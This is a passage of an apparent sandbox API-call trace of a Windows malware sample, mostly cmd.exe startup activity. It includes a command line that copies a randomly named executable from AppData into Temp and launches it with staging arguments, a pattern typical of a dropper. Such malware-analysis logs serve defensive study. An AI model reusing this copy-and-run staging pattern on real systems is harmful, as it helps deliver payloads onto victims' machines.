CodePage=0x1b5, lpCPInfo=0x4a7d4260 | out: lpCPInfo=0x4a7d4260) returned 1 [0092.824] SetThreadUILanguage (LangId=0x0) returned 0x409 [0092.824] exit (_Code=0) Process: id = "4" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16180" os_pid = "0xaac" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xa88" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe\" && \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"PREPARING\" \"60000\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 249 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 250 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 251 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 252 start_va = 0x70000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 253 start_va = 0x4a0f0000 end_va = 0x4a13bfff entry_point = 0x4a0f0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 254 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 255 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 256 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 257 start_va = 0x7ffd4000 end_va = 0x7ffd4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Region: id = 258 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 259 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 260 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 261 start_va = 0x60000 end_va = 0x6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 262 start_va = 0x170000 end_va = 0x1d6fff entry_point = 0x170000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 263 start_va = 0x250000 end_va = 0x34ffff entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 264 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 265 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 266 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 267 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 268 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 269 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 270 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 271 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 272 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 273 start_va = 0x350000 end_va = 0x417fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000350000" filename = "" Region: id = 274 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 275 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 276 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 277 start_va = 0x1e0000 end_va = 0x1e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 278 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 279 start_va = 0x200000 end_va = 0x200fff entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 280 start_va = 0x420000 end_va = 0x520fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 281 start_va = 0x530000 end_va = 0x112ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 282 start_va = 0x1130000 end_va = 0x1292fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001130000" filename = "" Region: id = 283 start_va = 0x12a0000 end_va = 0x156efff entry_point = 0x12a0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 4 os_tid = 0xab0 [0092.880] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x16ff4c | out: lpSystemTimeAsFileTime=0x16ff4c*(dwLowDateTime=0x764570a0, dwHighDateTime=0x1d440a9)) [0092.880] GetCurrentProcessId () returned 0xaac [0092.880] GetCurrentThreadId () returned 0xab0 [0092.880] GetTickCount () returned 0x22857 [0092.880] QueryPerformanceCounter (in: lpPerformanceCount=0x16ff44 | out: lpPerformanceCount=0x16ff44*=14966891127) returned 1 [0092.880] GetModuleHandleA (lpModuleName=0x0) returned 0x4a0f0000 [0092.880] __set_app_type (_Type=0x1) [0092.880] __p__fmode () returned 0x76b331f4 [0092.880] __p__commode () returned 0x76b331fc [0092.880] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a1121a6) returned 0x0 [0092.881] __getmainargs (in: _Argc=0x4a114238, _Argv=0x4a114240, _Env=0x4a11423c, _DoWildCard=0, _StartInfo=0x4a114140 | out: _Argc=0x4a114238, _Argv=0x4a114240, _Env=0x4a11423c) returned 0 [0092.881] GetCurrentThreadId () returned 0xab0 [0092.881] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xab0) returned 0x38 [0092.881] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0092.881] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0092.881] SetThreadUILanguage (LangId=0x0) returned 0x409 [0092.881] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0092.881] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x16fedc | out: phkResult=0x16fedc*=0x0) returned 0x2 [0092.881] VirtualQuery (in: lpAddress=0x16ff13, lpBuffer=0x16feac, dwLength=0x1c | out: lpBuffer=0x16feac*(BaseAddress=0x16f000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0092.881] VirtualQuery (in: lpAddress=0x70000, lpBuffer=0x16feac, dwLength=0x1c | out: lpBuffer=0x16feac*(BaseAddress=0x70000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0092.881] VirtualQuery (in: lpAddress=0x71000, lpBuffer=0x16feac, dwLength=0x1c | out: lpBuffer=0x16feac*(BaseAddress=0x71000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0092.881] VirtualQuery (in: lpAddress=0x73000, lpBuffer=0x16feac, dwLength=0x1c | out: lpBuffer=0x16feac*(BaseAddress=0x73000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0092.881] VirtualQuery (in: lpAddress=0x170000, lpBuffer=0x16feac, dwLength=0x1c | out: lpBuffer=0x16feac*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0092.881] GetConsoleOutputCP () returned 0x1b5 [0092.881] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a114260 | out: lpCPInfo=0x4a114260) returned 1 [0092.881] SetConsoleCtrlHandler (HandlerRoutine=0x4a10e72a, Add=1) returned 1 [0092.881] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.881] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0092.882] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.882] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a1141ac | out: lpMode=0x4a1141ac) returned 1 [0092.882] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.882] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0092.882] _get_osfhandle (_FileHandle=0) returned 0x3 [0092.882] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a1141b0 | out: lpMode=0x4a1141b0) returned 1 [0092.882] _get_osfhandle (_FileHandle=0) returned 0x3 [0092.882] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0092.882] GetEnvironmentStringsW () returned 0x260380* [0092.882] FreeEnvironmentStringsW (penv=0x260380) returned 1 [0092.883] GetEnvironmentStringsW () returned 0x260380* [0092.883] FreeEnvironmentStringsW (penv=0x260380) returned 1 [0092.883] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x16ee4c | out: phkResult=0x16ee4c*=0x40) returned 0x0 [0092.883] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x16ee54, lpData=0x16ee58, lpcbData=0x16ee50*=0x1000 | out: lpType=0x16ee54*=0x0, lpData=0x16ee58*=0x30, lpcbData=0x16ee50*=0x1000) returned 0x2 [0092.883] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x16ee54, lpData=0x16ee58, lpcbData=0x16ee50*=0x1000 | out: lpType=0x16ee54*=0x4, lpData=0x16ee58*=0x1, lpcbData=0x16ee50*=0x4) returned 0x0 [0092.883] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x16ee54, lpData=0x16ee58, lpcbData=0x16ee50*=0x1000 | out: lpType=0x16ee54*=0x0, lpData=0x16ee58*=0x1, lpcbData=0x16ee50*=0x1000) returned 0x2 [0092.883] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x16ee54, lpData=0x16ee58, lpcbData=0x16ee50*=0x1000 | out: lpType=0x16ee54*=0x4, lpData=0x16ee58*=0x0, lpcbData=0x16ee50*=0x4) returned 0x0 [0092.883] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x16ee54, lpData=0x16ee58, lpcbData=0x16ee50*=0x1000 | out: lpType=0x16ee54*=0x4, lpData=0x16ee58*=0x40, lpcbData=0x16ee50*=0x4) returned 0x0 [0092.883] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x16ee54, lpData=0x16ee58, lpcbData=0x16ee50*=0x1000 | out: lpType=0x16ee54*=0x4, lpData=0x16ee58*=0x40, lpcbData=0x16ee50*=0x4) returned 0x0 [0092.883] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x16ee54, lpData=0x16ee58, lpcbData=0x16ee50*=0x1000 | out: lpType=0x16ee54*=0x0, lpData=0x16ee58*=0x40, lpcbData=0x16ee50*=0x1000) returned 0x2 [0092.883] RegCloseKey (hKey=0x40) returned 0x0 [0092.883] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x16ee4c | out: phkResult=0x16ee4c*=0x40) returned 0x0 [0092.883] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x16ee54, lpData=0x16ee58, lpcbData=0x16ee50*=0x1000 | out: lpType=0x16ee54*=0x0, lpData=0x16ee58*=0x40, lpcbData=0x16ee50*=0x1000) returned 0x2 [0092.883] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x16ee54, lpData=0x16ee58, lpcbData=0x16ee50*=0x1000 | out: lpType=0x16ee54*=0x4, lpData=0x16ee58*=0x1, lpcbData=0x16ee50*=0x4) returned 0x0 [0092.883] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x16ee54, lpData=0x16ee58, lpcbData=0x16ee50*=0x1000 | out: lpType=0x16ee54*=0x0, lpData=0x16ee58*=0x1, lpcbData=0x16ee50*=0x1000) returned 0x2 [0092.883] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x16ee54, lpData=0x16ee58, lpcbData=0x16ee50*=0x1000 | out: lpType=0x16ee54*=0x4, lpData=0x16ee58*=0x0, lpcbData=0x16ee50*=0x4) returned 0x0 [0092.883] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x16ee54, lpData=0x16ee58, lpcbData=0x16ee50*=0x1000 | out: lpType=0x16ee54*=0x4, lpData=0x16ee58*=0x9, lpcbData=0x16ee50*=0x4) returned 0x0 [0092.883] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x16ee54, lpData=0x16ee58, lpcbData=0x16ee50*=0x1000 | out: lpType=0x16ee54*=0x4, lpData=0x16ee58*=0x9, lpcbData=0x16ee50*=0x4) returned 0x0 [0092.883] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x16ee54, lpData=0x16ee58, lpcbData=0x16ee50*=0x1000 | out: lpType=0x16ee54*=0x0, lpData=0x16ee58*=0x9, lpcbData=0x16ee50*=0x1000) returned 0x2 [0092.883] RegCloseKey (hKey=0x40) returned 0x0 [0092.883] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886347 [0092.883] srand (_Seed=0x5b886347) [0092.883] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe\" && \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"PREPARING\" \"60000\"" [0092.883] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe\" && \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"PREPARING\" \"60000\"" [0092.884] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a115260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0092.884] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x261ae0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0092.884] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0092.884] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0092.884] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0092.884] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0092.884] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0092.884] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0092.884] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0092.884] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0092.884] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0092.884] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0092.884] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0092.884] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0092.884] GetEnvironmentStringsW () returned 0x2624d0* [0092.884] FreeEnvironmentStringsW (penv=0x2624d0) returned 1 [0092.884] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0092.884] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0092.884] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0092.885] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0092.885] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0092.885] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0092.885] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0092.885] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0092.885] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0092.885] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0092.885] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x16fc18 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0092.885] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x16fc18, lpFilePart=0x16fc14 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x16fc14*="Desktop") returned 0x18 [0092.885] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0092.885] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x16f994 | out: lpFindFileData=0x16f994) returned 0x260b60 [0092.885] FindClose (in: hFindFile=0x260b60 | out: hFindFile=0x260b60) returned 1 [0092.885] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x16f994 | out: lpFindFileData=0x16f994) returned 0x260b60 [0092.885] FindClose (in: hFindFile=0x260b60 | out: hFindFile=0x260b60) returned 1 [0092.885] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x16f994 | out: lpFindFileData=0x16f994) returned 0x260b60 [0092.885] FindClose (in: hFindFile=0x260b60 | out: hFindFile=0x260b60) returned 1 [0092.885] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0092.885] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0092.885] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0092.886] GetEnvironmentStringsW () returned 0x260380* [0092.886] FreeEnvironmentStringsW (penv=0x260380) returned 1 [0092.886] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a115260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0092.886] GetConsoleOutputCP () returned 0x1b5 [0092.886] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a114260 | out: lpCPInfo=0x4a114260) returned 1 [0092.886] GetUserDefaultLCID () returned 0x409 [0092.887] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a114950, cchData=8 | out: lpLCData=":") returned 2 [0092.887] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x16fd58, cchData=128 | out: lpLCData="0") returned 2 [0092.887] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x16fd58, cchData=128 | out: lpLCData="0") returned 2 [0092.887] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x16fd58, cchData=128 | out: lpLCData="1") returned 2 [0092.887] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a114940, cchData=8 | out: lpLCData="/") returned 2 [0092.887] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a114d80, cchData=32 | out: lpLCData="Mon") returned 4 [0092.887] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a114d40, cchData=32 | out: lpLCData="Tue") returned 4 [0092.887] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a114d00, cchData=32 | out: lpLCData="Wed") returned 4 [0092.887] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a114cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0092.887] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a114c80, cchData=32 | out: lpLCData="Fri") returned 4 [0092.887] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a114c40, cchData=32 | out: lpLCData="Sat") returned 4 [0092.887] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a114c00, cchData=32 | out: lpLCData="Sun") returned 4 [0092.887] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a114930, cchData=8 | out: lpLCData=".") returned 2 [0092.887] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a114920, cchData=8 | out: lpLCData=",") returned 2 [0092.887] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0092.888] GetConsoleTitleW (in: lpConsoleTitle=0x250a08, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0092.888] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0092.888] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0092.888] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0092.888] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0092.889] _wcsicmp (_String1="type", _String2=")") returned 75 [0092.889] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0092.889] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0092.889] _wcsicmp (_String1="IF", _String2="type") returned -11 [0092.889] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0092.889] _wcsicmp (_String1="REM", _String2="type") returned -2 [0092.889] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0092.893] _wcsicmp (_String1="FOR", _String2="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe\"") returned 68 [0092.893] _wcsicmp (_String1="FOR/?", _String2="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe\"") returned 68 [0092.893] _wcsicmp (_String1="IF", _String2="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe\"") returned 71 [0092.893] _wcsicmp (_String1="IF/?", _String2="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe\"") returned 71 [0092.893] _wcsicmp (_String1="REM", _String2="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe\"") returned 80 [0092.893] _wcsicmp (_String1="REM/?", _String2="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe\"") returned 80 [0092.895] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.895] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.895] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.895] GetFileType (hFile=0x7) returned 0x2 [0092.895] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0092.895] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x16fbec | out: lpMode=0x16fbec) returned 1 [0092.896] _dup (_FileHandle=1) returned 3 [0092.896] _close (_FileHandle=1) returned 0 [0092.896] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe", _String2="con") returned -53 [0092.896] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\cnuu8vyt.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x16fbbc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0092.896] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0092.897] GetConsoleTitleW (in: lpConsoleTitle=0x16f9ec, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0092.897] _wcsicmp (_String1="type", _String2="DIR") returned 16 [0092.897] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0092.897] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0092.897] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0092.897] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a115260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0092.898] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe", fInfoLevelId=0x1, lpFindFileData=0x16f550, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x16f550) returned 0x250f60 [0092.898] _wcsicmp (_String1="XEY8d7zI.exe", _String2=".") returned 74 [0092.898] _wcsicmp (_String1="XEY8d7zI.exe", _String2="..") returned 74 